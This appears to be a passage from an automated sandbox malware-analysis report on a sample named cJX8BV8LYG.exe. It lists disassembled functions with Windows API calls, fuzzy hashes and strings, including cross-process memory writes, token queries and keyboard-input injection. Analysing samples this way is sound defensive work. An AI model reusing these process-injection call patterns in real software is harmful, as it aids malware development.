                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                    • String ID: .z
                                    • API String ID: 2434981716-427214572
                                    • Opcode ID: c316adc21126b173c6d4dd8174078221595f1192f7d385803dc3a27e3b0628a8
                                    • Instruction ID: 90ca57456f8a2ec4e89ce110f049663caaa2291a16e2dbc9f3dff4941ce71c2c
                                    • Opcode Fuzzy Hash: c316adc21126b173c6d4dd8174078221595f1192f7d385803dc3a27e3b0628a8
                                    • Instruction Fuzzy Hash: 04417CF0604145AFC7649F74CC84BFE7FADEB85304B288199F45487242DE398C02C751
                                    APIs
                                      • Part of subcall function 007EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007E21D0,?,?,00000034,00000800,?,00000034), ref: 007EB42D
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007E2760
                                      • Part of subcall function 007EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 007EB3F8
                                      • Part of subcall function 007EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 007EB355
                                      • Part of subcall function 007EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007E2194,00000034,?,?,00001004,00000000,00000000), ref: 007EB365
                                      • Part of subcall function 007EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007E2194,00000034,?,?,00001004,00000000,00000000), ref: 007EB37B
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007E27CD
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007E281A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\cJX8BV8LYG.exe,00000104), ref: 007B1769
                                    • _free.LIBCMT ref: 007B1834
                                    • _free.LIBCMT ref: 007B183E
                                    Strings
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Users\user\Desktop\cJX8BV8LYG.exe
                                    APIs
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007EC306
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 007EC34C
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00851990,010A7200), ref: 007EC395
                                    Strings
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem
                                    • String ID: 0
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0081CC08,00000000,?,?,?,?), ref: 008144AA
                                    • GetWindowLongW.USER32 ref: 008144C7
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008144D7
                                    Strings
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    APIs
                                    • SysReAllocString.OLEAUT32(?,?), ref: 007E6EED
                                    • VariantCopyInd.OLEAUT32(?,?), ref: 007E6F08
                                    • VariantClear.OLEAUT32(?), ref: 007E6F12
                                    Strings
                                    Similarity
                                    • API ID: Variant$AllocClearCopyString
                                    • String ID: *j~
                                    APIs
                                      • Part of subcall function 0080335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00803077,?,?), ref: 00803378
                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0080307A
                                    • _wcslen.LIBCMT ref: 0080309B
                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00803106
                                    Strings
                                    Similarity
                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                    • String ID: 255.255.255.255
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00813F40
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00813F54
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00813F78
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00814705
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00814713
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0081471A
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00813840
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00813850
                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00813876
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 007F4A08
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007F4A5C
                                    • SetErrorMode.KERNEL32(00000000,?,?,0081CC08), ref: 007F4AD0
                                    Strings
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume
                                    • String ID: %lu
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0081424F
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00814264
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00814271
                                    Strings
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    APIs
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                      • Part of subcall function 007E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 007E2DC5
                                      • Part of subcall function 007E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 007E2DD6
                                      • Part of subcall function 007E2DA7: GetCurrentThreadId.KERNEL32 ref: 007E2DDD
                                      • Part of subcall function 007E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 007E2DE4
                                    • GetFocus.USER32 ref: 007E2F78
                                      • Part of subcall function 007E2DEE: GetParent.USER32(00000000), ref: 007E2DF9
                                    • GetClassNameW.USER32(?,?,00000100), ref: 007E2FC3
                                    • EnumChildWindows.USER32(?,007E303B), ref: 007E2FEB
                                    Strings
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                    • String ID: %s%d
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008158C1
                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008158EE
                                    • DrawMenuBar.USER32(?), ref: 008158FD
                                    Strings
                                    Similarity
                                    • API ID: Menu$InfoItem$Draw
                                    • String ID: 0
                                    APIs
                                    • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 007DD3BF
                                    • FreeLibrary.KERNEL32 ref: 007DD3E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AddressFreeLibraryProc
                                    • String ID: GetSystemWow64DirectoryW$X64
                                    • API String ID: 3013587201-2590602151
                                    APIs
                                    Similarity
                                    • API ID: Variant$ClearInitInitializeUninitialize
                                    • String ID:
                                    • API String ID: 1998397398-0
                                    APIs
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0081FC08,?), ref: 007E05F0
                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0081FC08,?), ref: 007E0608
                                    • CLSIDFromProgID.OLE32(?,?,00000000,0081CC40,000000FF,?,00000000,00000800,00000000,?,0081FC08,?), ref: 007E062D
                                    • _memcmp.LIBVCRUNTIME ref: 007E064E
                                    Similarity
                                    • API ID: FromProg$FreeTask_memcmp
                                    • String ID:
                                    • API String ID: 314563124-0
                                    APIs
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    APIs
                                    • GetWindowRect.USER32(010B0A20,?), ref: 008162E2
                                    • ScreenToClient.USER32(?,?), ref: 00816315
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00816382
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    APIs
                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00801AFD
                                    • WSAGetLastError.WSOCK32 ref: 00801B0B
                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00801B8A
                                    • WSAGetLastError.WSOCK32 ref: 00801B94
                                    Similarity
                                    • API ID: ErrorLast$socket
                                    • String ID:
                                    • API String ID: 1881357543-0
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007F5783
                                    • GetLastError.KERNEL32(?,00000000), ref: 007F57A9
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007F57CE
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007F57FA
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,007A6D71,00000000,00000000,007A82D9,?,007A82D9,?,00000001,007A6D71,?,00000001,007A82D9,007A82D9), ref: 007BD910
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007BD999
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007BD9AB
                                    • __freea.LIBCMT ref: 007BD9B4
                                      • Part of subcall function 007B3820: RtlAllocateHeap.NTDLL(00000000,?,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6,?,00781129), ref: 007B3852
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                    • String ID:
                                    • API String ID: 2652629310-0
                                    APIs
                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00815352
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00815375
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00815382
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008153A8
                                    Similarity
                                    • API ID: LongWindow$InvalidateMessageRectSend
                                    • String ID:
                                    • API String ID: 3340791633-0
                                    APIs
                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007EABF1
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 007EAC0D
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 007EAC74
                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007EACC6
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0081769A
                                    • GetWindowRect.USER32(?,?), ref: 00817710
                                    • PtInRect.USER32(?,?,00818B89), ref: 00817720
                                    • MessageBeep.USER32(00000000), ref: 0081778C
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 008116EB
                                      • Part of subcall function 007E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007E3A57
                                      • Part of subcall function 007E3A3D: GetCurrentThreadId.KERNEL32 ref: 007E3A5E
                                      • Part of subcall function 007E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007E25B3), ref: 007E3A65
                                    • GetCaretPos.USER32(?), ref: 008116FF
                                    • ClientToScreen.USER32(00000000,?), ref: 0081174C
                                    • GetForegroundWindow.USER32 ref: 00811752
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 007ED501
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 007ED50F
                                    • Process32NextW.KERNEL32(00000000,?), ref: 007ED52F
                                    • CloseHandle.KERNEL32(00000000), ref: 007ED5DC
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    APIs
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    • GetCursorPos.USER32(?), ref: 00819001
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007D7711,?,?,?,?,?), ref: 00819016
                                    • GetCursorPos.USER32(?), ref: 0081905E
                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007D7711,?,?,?), ref: 00819094
                                    Similarity
                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                    • String ID:
                                    • API String ID: 2864067406-0
                                    APIs
                                    • GetFileAttributesW.KERNEL32(?,0081CB68), ref: 007ED2FB
                                    • GetLastError.KERNEL32 ref: 007ED30A
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 007ED319
                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0081CB68), ref: 007ED376
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                    • String ID:
                                    • API String ID: 2267087916-0
                                    APIs
                                      • Part of subcall function 007E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007E102A
                                      • Part of subcall function 007E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007E1036
                                      • Part of subcall function 007E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007E1045
                                      • Part of subcall function 007E1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007E104C
                                      • Part of subcall function 007E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007E1062
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007E15BE
                                    • _memcmp.LIBVCRUNTIME ref: 007E15E1
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E1617
                                    • HeapFree.KERNEL32(00000000), ref: 007E161E
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 1592001646-0
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0081280A
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00812824
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00812832
                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00812840
                                    Similarity
                                    • API ID: Window$Long$AttributesLayered
                                    • String ID:
                                    • API String ID: 2169480361-0
                                    APIs
                                      • Part of subcall function 007E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,007E790A,?,000000FF,?,007E8754,00000000,?,0000001C,?,?), ref: 007E8D8C
                                      • Part of subcall function 007E8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 007E8DB2
                                      • Part of subcall function 007E8D7D: lstrcmpiW.KERNEL32(00000000,?,007E790A,?,000000FF,?,007E8754,00000000,?,0000001C,?,?), ref: 007E8DE3
                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,007E8754,00000000,?,0000001C,?,?,00000000), ref: 007E7923
                                    • lstrcpyW.KERNEL32(00000000,?), ref: 007E7949
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,007E8754,00000000,?,0000001C,?,?,00000000), ref: 007E7984
                                    Strings
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    APIs
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00817D0B
                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00817D2A
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00817D42
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007FB7AD,00000000), ref: 00817D6B
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID:
                                    • API String ID: 847901565-0
                                    APIs
                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 008156BB
                                    • _wcslen.LIBCMT ref: 008156CD
                                    • _wcslen.LIBCMT ref: 008156D8
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00815816
                                    Similarity
                                    • API ID: MessageSend_wcslen
                                    • String ID:
                                    • API String ID: 455545452-0
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007E1A47
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007E1A59
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007E1A6F
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007E1A8A
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 007EE1FD
                                    • MessageBoxW.USER32(?,?,?,?), ref: 007EE230
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007EE246
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007EE24D
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2880819207-0
                                    APIs
                                    • CreateThread.KERNEL32(00000000,?,007ACFF9,00000000,00000004,00000000), ref: 007AD218
                                    • GetLastError.KERNEL32 ref: 007AD224
                                    • __dosmaperr.LIBCMT ref: 007AD22B
                                    • ResumeThread.KERNEL32(00000000), ref: 007AD249
                                    Similarity
                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                    • String ID:
                                    • API String ID: 173952441-0
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0078604C
                                    • GetStockObject.GDI32(00000011), ref: 00786060
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0078606A
                                    Similarity
                                    • API ID: CreateMessageObjectSendStockWindow
                                    • String ID:
                                    • API String ID: 3970641297-0
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 007A3B56
                                      • Part of subcall function 007A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 007A3AD2
                                      • Part of subcall function 007A3AA3: ___AdjustPointer.LIBCMT ref: 007A3AED
                                    • _UnwindNestedFrames.LIBCMT ref: 007A3B6B
                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 007A3B7C
                                    • CallCatchBlock.LIBVCRUNTIME ref: 007A3BA4
                                    Similarity
                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                    • String ID:
                                    • API String ID: 737400349-0
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007813C6,00000000,00000000,?,007B301A,007813C6,00000000,00000000,00000000,?,007B328B,00000006,FlsSetValue), ref: 007B30A5
                                    • GetLastError.KERNEL32(?,007B301A,007813C6,00000000,00000000,00000000,?,007B328B,00000006,FlsSetValue,00822290,FlsSetValue,00000000,00000364,?,007B2E46), ref: 007B30B1
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007B301A,007813C6,00000000,00000000,00000000,?,007B328B,00000006,FlsSetValue,00822290,FlsSetValue,00000000), ref: 007B30BF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 007E747F
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007E7497
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007E74AC
                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007E74CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Type$Register$FileLoadModuleNameUser
                                    • String ID:
                                    • API String ID: 1352324309-0
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,007EACD3,?,00008000), ref: 007EB0C4
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,007EACD3,?,00008000), ref: 007EB0E9
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,007EACD3,?,00008000), ref: 007EB0F3
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,007EACD3,?,00008000), ref: 007EB126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 007E2DC5
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007E2DD6
                                    • GetCurrentThreadId.KERNEL32 ref: 007E2DDD
                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 007E2DE4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    APIs
                                      • Part of subcall function 00799639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00799693
                                      • Part of subcall function 00799639: SelectObject.GDI32(?,00000000), ref: 007996A2
                                      • Part of subcall function 00799639: BeginPath.GDI32(?), ref: 007996B9
                                      • Part of subcall function 00799639: SelectObject.GDI32(?,00000000), ref: 007996E2
                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00818887
                                    • LineTo.GDI32(?,?,?), ref: 00818894
                                    • EndPath.GDI32(?), ref: 008188A4
                                    • StrokePath.GDI32(?), ref: 008188B2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 007998CC
                                    • SetTextColor.GDI32(?,?), ref: 007998D6
                                    • SetBkMode.GDI32(?,00000001), ref: 007998E9
                                    • GetStockObject.GDI32(00000005), ref: 007998F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Color$ModeObjectStockText
                                    • String ID:
                                    • API String ID: 4037423528-0
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 007E1634
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,007E11D9), ref: 007E163B
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007E11D9), ref: 007E1648
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,007E11D9), ref: 007E164F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 007DD858
                                    • GetDC.USER32(00000000), ref: 007DD862
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007DD882
                                    • ReleaseDC.USER32(?), ref: 007DD8A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 007DD86C
                                    • GetDC.USER32(00000000), ref: 007DD876
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007DD882
                                    • ReleaseDC.USER32(?), ref: 007DD8A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    APIs
                                      • Part of subcall function 00787620: _wcslen.LIBCMT ref: 00787625
                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 007F4ED4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Connection_wcslen
                                    • String ID: *$LPT
                                    • API String ID: 1725874428-3443410124
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 007AE30D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: #
                                    • API String ID: 0-1885708031
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 0079F2A2
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0079F2BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 008057E0
                                    • _wcslen.LIBCMT ref: 008057EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: BuffCharUpper_wcslen
                                    • String ID: CALLARGARRAY
                                    • API String ID: 157775604-1150593374
                                    APIs
                                    • _wcslen.LIBCMT ref: 007FD130
